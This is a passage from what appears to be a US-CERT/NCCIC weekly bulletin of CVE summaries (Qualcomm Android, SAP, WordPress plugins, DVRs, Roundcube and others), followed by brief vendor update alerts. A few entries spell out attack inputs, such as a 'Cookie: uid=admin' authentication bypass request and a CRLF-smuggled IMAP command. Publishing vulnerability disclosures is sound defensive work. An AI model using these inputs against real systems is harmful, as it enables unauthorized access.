In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MDM9635M, MDM9650, MDM9655, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 820, SD 835, SD 845, SDM630, SDM636, SDM660, Snapdragon_High_Med_2016, the default build configuration of deviceprogrammer in BOOT.BF.3.0 enables the flag SKIP_SECBOOT_CHECK_NOT_RECOMMENDED_BY_QUALCOMM which will open up the peek and poke commands to any memory location on the target. 2018-04-11 not yet calculated CVE-2018-3591
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MDM9206, MDM9607, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, debug policy can potentially be bypassed. 2018-04-11 not yet calculated CVE-2017-18071
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile and Snapdragon Wear MSM8909W, SD 210/SD 212/SD 205, SD 450, SD 615/16/SD 415, SD 625, SD 650/52, SD 820, SD 835, SD 845, a Use After Free condition can occur in RIL while handling requests from Android. 2018-04-11 not yet calculated CVE-2018-3590
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 400, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 810, SD 820, SD 820A, SD 835, SD 845, when processing a call disconnection, there is an attempt to print the RIL token-id to the debug log. If eMBMS service is enabled while processing the call disconnect, a Use After Free condition may potentially occur. 2018-04-11 not yet calculated CVE-2017-18140
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile and Snapdragon Mobile MDM9206, MDM9607, MDM8996, an out-of-bounds access can potentially occur in tz_assign(). 2018-04-11 not yet calculated CVE-2017-18132
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 400, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 820, SD 820A, SD 835, SD 845, while playing an ASF file, a buffer over-read can potentially occur. 2018-04-11 not yet calculated CVE-2017-18130
BID
CONFIRMqualcomm -- android
In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Mobile MDM9640, MDM9645, MDM9650, MDM9655, SD 450, SD 625, SD 650/52, SD 810, SD 820, SD 835, while processing the IPv6 pdp address of the pdp context, a buffer overflow can occur. 2018-04-11 not yet calculated CVE-2017-18137
BID
CONFIRMred_hat -- gluster_storage_and_enterprise_linux
rhnreg_ks in Red Hat Network Client Tools (aka rhn-client-tools) on Red Hat Gluster Storage 2.1 and Enterprise Linux (RHEL) 5, 6, and 7 does not properly validate hostnames in X.509 certificates from SSL servers, which allows remote attackers to prevent system registration via a man-in-the-middle attack. 2018-04-12 not yet calculated CVE-2015-1777
MLIST
BID
CONFIRMroundcube -- roundcube
In Roundcube from versions 1.2.0 to 1.3.5, with the archive plugin enabled and configured, it's possible to exploit the unsanitized, user-controlled "_uid" parameter (in an archive.php _task=mail&_mbox=INBOX&_action=plugin.move2archive request) to perform an MX (IMAP) injection attack by placing an IMAP command after a %0d%0a sequence. NOTE: this is less easily exploitable in 1.3.4 and later because of a Same Origin Policy protection mechanism. 2018-04-07 not yet calculated CVE-2018-9846
MISC
MISC
MISCsap -- business_objects
Improper Session Management in SAP Business Objects, 4.0, from 4.10, from 4.20, 4.30, CMC/BI Launchpad/Fiorified BI Launchpad. In case of password change for a user, all other active sessions created using older password continues to be active. 2018-04-10 not yet calculated CVE-2018-2408
BID
CONFIRM
MISCsap -- business_one
SAP Business One, 9.2, 9.3, browser access does not sufficiently encode user controlled inputs, which results in a Cross-Site Scripting (XSS) vulnerability. 2018-04-10 not yet calculated CVE-2018-2410
BID
CONFIRM
MISCsap -- cloud_platform
Improper session management when using SAP Cloud Platform 2.0 (Connectivity Service and Cloud Connector). Under certain conditions, data of some other user may be shown or modified when using an application built on top of SAP Cloud Platform. 2018-04-10 not yet calculated CVE-2018-2409
BID
CONFIRM
MISCsap -- crystal_reports_server
Unquoted windows search path (directory/path traversal) vulnerability in Crystal Reports Server, OEM Edition (CRSE), 4.0, 4.10, 4.20, 4.30, startup path. 2018-04-10 not yet calculated CVE-2018-2406
BID
CONFIRM
MISCsap -- disclosure_management
SAP Disclosure Management 10.1 does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2018-04-10 not yet calculated CVE-2018-2412
BID
CONFIRM
MISCsap -- disclosure_management
SAP Disclosure Management 10.1 does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2018-04-10 not yet calculated CVE-2018-2413
BID
CONFIRM
MISCsap -- disclosure_management
Under certain conditions, SAP Disclosure Management 10.1 allows an attacker to access information which would otherwise be restricted. It is possible for an authorized user to get SAP Disclosure Management to point a specific chapter type to a chapter the user has not been given access to. 2018-04-10 not yet calculated CVE-2018-2403
BID
CONFIRM
MISCsap -- disclosure_management
SAP Disclosure Management 10.1 allows an attacker to upload any file without proper file format validation. 2018-04-10 not yet calculated CVE-2018-2404
BID
CONFIRM
MISCsap -- solution_manager
SAP Solution Manager, 7.10, 7.20, Incident Management Work Center allows an attacker to upload a malicious script as an attachment and this could lead to possible Cross-Site Scripting. 2018-04-10 not yet calculated CVE-2018-2405
BID
CONFIRM
MISCsecutech -- ris-11_and_ris-22_and_ris-33_devices
Secutech RiS-11, RiS-22, and RiS-33 devices with firmware V5.07.52_es_FRI01 allow DNS settings changes via a goform/AdvSetDns?GO=wan_dns.asp request in conjunction with a crafted admin cookie. 2018-04-13 not yet calculated CVE-2018-10080
EXPLOIT-DBsymantec -- advanced_secure_gateway_and_proxysg_management_consoles
Stored XSS vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can inject arbitrary JavaScript code in the management console web client application. 2018-04-11 not yet calculated CVE-2017-13678
BID
CONFIRMsymantec -- advanced_secure_gateway_and_proxysg_management_consoles
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. 2018-04-11 not yet calculated CVE-2016-10258
BID
CONFIRMsymantec -- advanced_secure_gateway_and_proxysg_management_consoles
Denial-of-service (DoS) vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A remote attacker can use crafted HTTP/HTTPS requests to cause denial-of-service through management console application crashes. 2018-04-11 not yet calculated CVE-2017-13677
BID
CONFIRMtbk -- dvr4104_and_dvr4216_devices
TBK DVR4104 and DVR4216 devices allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. 2018-04-10 not yet calculated CVE-2018-9995
MISCtryton -- trytond
The safe_eval function in trytond in Tryton before 2.4.15, 2.6.x before 2.6.14, 2.8.x before 2.8.11, 3.0.x before 3.0.7, and 3.2.x before 3.2.3 allows remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the collection.domain in the webdav module or (2) the formula field in the price_list module. 2018-04-12 not yet calculated CVE-2014-6633
CONFIRM
CONFIRMtypo3 -- typo3
The page module in TYPO3 before 8.7.11, and 9.1.0, has XSS via $GLOBALS['TYPO3_CONF_VARS']['SYS']['sitename'], as demonstrated by an admin entering a crafted site name during the installation process. 2018-04-08 not yet calculated CVE-2018-6905
MISC
MISCubiquoss -- switch_vp5208a
ubiQuoss Switch VP5208A creates a bcm_password file at /cgi-bin/ with the user credentials in cleartext when a failed login attempt occurs. The file can be reached via an HTTP request. The credentials can be used to access the system via SSH (or TELNET if it is enabled). 2018-04-11 not yet calculated CVE-2018-10024
MISCunify -- openstage_sip_and_openscape_desk_phone_ip_devices
CRLF injection vulnerability in the web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allows remote authenticated users to modify the root password and consequently access the debug port using the serial interface via the ssh-password parameter to page.cmd. 2018-04-12 not yet calculated CVE-2014-9563
CONFIRM
MISCunify -- openstage_sip_and_openscape_desk_phone_ip_devices
Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allow remote attackers to gain super-user privileges by leveraging SSH access and incorrect ownership of (1) ConfigureCoreFile.sh, (2) Traceroute.sh, (3) apps.sh, (4) conversion_java2native.sh, (5) coreCompression.sh, (6) deletePasswd.sh, (7) findHealthSvcFDs.sh, (8) fw_printenv.sh, (9) fw_setenv.sh, (10) hw_wd_kicker.sh, (11) new_rootfs.sh, (12) opera_killSnmpd.sh, (13) opera_startSnmpd.sh, (14) rebootOperaSoftware.sh, (15) removeLogFiles.sh, (16) runOperaServices.sh, (17) setPasswd.sh, (18) startAccTestSvcs.sh, (19) usbNotification.sh, or (20) appWeb in /Opera_Deploy. 2018-04-12 not yet calculated CVE-2014-8421
CONFIRM
MISCunify -- openstage_sip_and_openscape_desk_phone_ip_devices
The web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 generates session cookies with insufficient entropy, which makes it easier for remote attackers to hijack sessions via a brute-force attack. 2018-04-12 not yet calculated CVE-2014-8422
CONFIRM
MISCvmware -- vrealize_automation
VMware vRealize Automation (vRA) prior to 7.4.0 contains a vulnerability in the handling of session IDs. Exploitation of this issue may lead to the hijacking of a valid vRA user's session. 2018-04-13 not yet calculated CVE-2018-6959
BID
SECTRACK
CONFIRMvmware -- vrealize_automation
VMware vRealize Automation (vRA) prior to 7.3.1 contains a vulnerability that may allow for a DOM-based cross-site scripting (XSS) attack. Exploitation of this issue may lead to the compromise of the vRA user's workstation. 2018-04-13 not yet calculated CVE-2018-6958
BID
SECTRACK
CONFIRMwordpress -- wordpress
The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS. 2018-04-07 not yet calculated CVE-2018-9844
CONFIRM
EXPLOIT-DB
CONFIRMwordpress -- wordpress
Cross-site scripting (XSS) vulnerability in the new_Twitter_sign_button function in nextend-Twitter-connect.php in the Nextend Twitter Connect plugin before 1.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter. NOTE: this may overlap CVE-2015-4413. 2018-04-12 not yet calculated CVE-2015-4557
MISC
FULLDISC
BID
CONFIRMwordpress -- wordpress
The WP Live Chat Support plugin before 8.0.06 for WordPress has stored XSS via the Name field. 2018-04-09 not yet calculated CVE-2018-9864
MISC
MISC
MISCwordpress -- wordpress
WordPress before 4.4 makes it easier for remote attackers to predict password-recovery tokens via a brute-force approach. 2018-04-12 not yet calculated CVE-2014-6412
MISC
FULLDISC
FULLDISC
BID
SECTRACK
CONFIRM
CONFIRMwordpress -- wordpress
The Group creation process in the Buddypress plugin before 1.9.2 for WordPress allows remote authenticated users to gain control of arbitrary groups by leveraging a missing permissions check. 2018-04-10 not yet calculated CVE-2014-1889
BUGTRAQ
BID
CONFIRM
XFwordpress -- wordpress
The EZPZ One Click Backup (ezpz-one-click-backup) plugin 12.03.10 and earlier for WordPress allows remote attackers to execute arbitrary commands via the cmd parameter to functions/ezpz-archive-cmd.php. 2018-04-10 not yet calculated CVE-2014-3114
MLISTwordpress -- wordpress
exports/download.php in the 99 Robots WP Background Takeover Advertisements plugin before 4.1.5 for WordPress has Directory Traversal via a .. in the filename parameter. 2018-04-12 not yet calculated CVE-2018-9118
CONFIRM
MISCwuzhi_cms -- wuzhi_cms
An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add. 2018-04-10 not yet calculated CVE-2018-9926
MISC
EXPLOIT-DBwuzhi_cms -- wuzhi_cms
An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add. 2018-04-10 not yet calculated CVE-2018-9927
MISCyunucms -- yunucms
YUNUCMS 1.0.7 has XSS via the content title on an admin/content/addcontent/cid/## page (aka a news center page). 2018-04-10 not yet calculated CVE-2018-9993
MISCyzmcms -- yzmcms
The WeChat module in YzmCMS 3.7.1 has reflected XSS via the admin/module/init.html echostr parameter, related to the valid function in application/wechat/controller/index.class.php. 2018-04-11 not yet calculated CVE-2018-10026
MISCzabbix -- zabbix
An information disclosure vulnerability exists in the iConfig proxy request of Zabbix server 2.4.X. A specially crafted iConfig proxy request can cause the Zabbix server to send the configuration information of any Zabbix proxy, resulting in information disclosure. An attacker can make requests from an active Zabbix proxy to trigger this vulnerability. 2018-04-09 not yet calculated CVE-2017-2826
MISCzsh -- zsh
zsh through version 5.4.2 is vulnerable to a stack-based buffer overflow in the utils.c:checkmailpath function. A local attacker could exploit this to execute arbitrary code in the context of another user. 2018-04-11 not yet calculated CVE-2018-1100
CONFIRM
CONFIRM
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 13, 2018
VMware has released security updates to address a vulnerability in vRealize Automation. An attacker could exploit this vulnerability to take control of an affected system.
NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0009 and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 12, 2018
Juniper Networks has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
NCCIC encourages users and administrators to review the following Juniper Security Advisories and apply necessary updates:
- Junos OS: Kernel crash upon receipt of crafted CLNP packets (CVE-2018-0016)
- SRX Series: Denial-of-service vulnerability in flowd daemon on devices configured with NAT-PT (CVE-2018-0017)
- SRX Series: Crafted packet may lead to information disclosure and firewall rule bypass during compilation of IDP policies (CVE-2018-0018)
- Junos: Denial-of-service vulnerability in SNMP MIB-II subagent daemon (mib2d) (CVE-2018-0019)
- Junos OS: rpd daemon cores due to malformed BGP UPDATE packet (CVE-2018-0020)
- Steel-Belted Radius Carrier: Eclipse Jetty information disclosure vulnerability (CVE-2015-2080)
- NorthStar: Return of Bleichenbacher?s Oracle Threat (ROBOT) RSA SSL attack (CVE-2017-1000385)
- OpenSSL: Multiple vulnerabilities resolved in OpenSSL
- Junos OS: Multiple vulnerabilities in stunnel 5.38
- NSM Appliance: Multiple vulnerabilities resolved in CentOS 6.5-based 2012.2R12 release
- Junos OS: Short MacSec keys may allow man-in-the-middle attacks
- Junos OS: Mbuf leak due to processing MPLS packets in VPLS networks (CVE-2018-0022)
- Junos Snapshot Administrator (JSNAPy) world writeable default configuration file permission (CVE-2018-0023)
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 10, 2018
Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
NCCIC encourages users and administrators to review Microsoft's April 2018 Security Update Summary and Deployment Information and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.